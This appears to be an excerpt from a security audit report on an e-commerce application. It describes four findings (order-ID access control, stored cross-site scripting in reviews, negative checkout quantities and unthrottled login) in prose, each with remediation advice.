Application Security

Description

The /api/v1/orders/{orderId} endpoint does not validate that the authenticated user is the owner of the requested order. By iterating the numeric orderId parameter, an attacker can retrieve full order details, shipping addresses, and partial payment information for any customer.

Recommendation

Implement server-side object ownership validation on all API endpoints. Use UUIDs or cryptographic tokens instead of sequential numeric IDs. Add rate limiting and anomaly detection on sensitive API endpoints.

Description

Product review content is stored without sanitisation and rendered without encoding in the product listing pages. An attacker can submit a review containing malicious JavaScript that executes in the browser of any user viewing the product. The application session cookie lacks the HttpOnly flag, enabling full session theft.

Recommendation

Implement context-sensitive output encoding using a trusted library (e.g. DOMPurify). Set HttpOnly and Secure flags on all session cookies. Apply a strict Content Security Policy.

Description

The checkout API accepts negative product quantities. Submitting a cart with -1 quantity of a high-value item reduces the total payable amount, potentially allowing items to be purchased for zero cost or a net credit applied to the account.

Recommendation

Validate all quantity fields server-side with a minimum value of 1. Recompute cart totals server-side at checkout using trusted inventory data rather than client-supplied values.

Description

The /auth/login endpoint does not implement rate limiting or CAPTCHA for repeated failed authentication attempts. An attacker can perform automated credential stuffing or brute-force attacks without triggering account lockout.

Recommendation

Implement progressive rate limiting (exponential backoff after 5 failed attempts). Add CAPTCHA after 3 consecutive failures. Integrate with a threat intelligence feed for known credential-stuffed email/password pairs.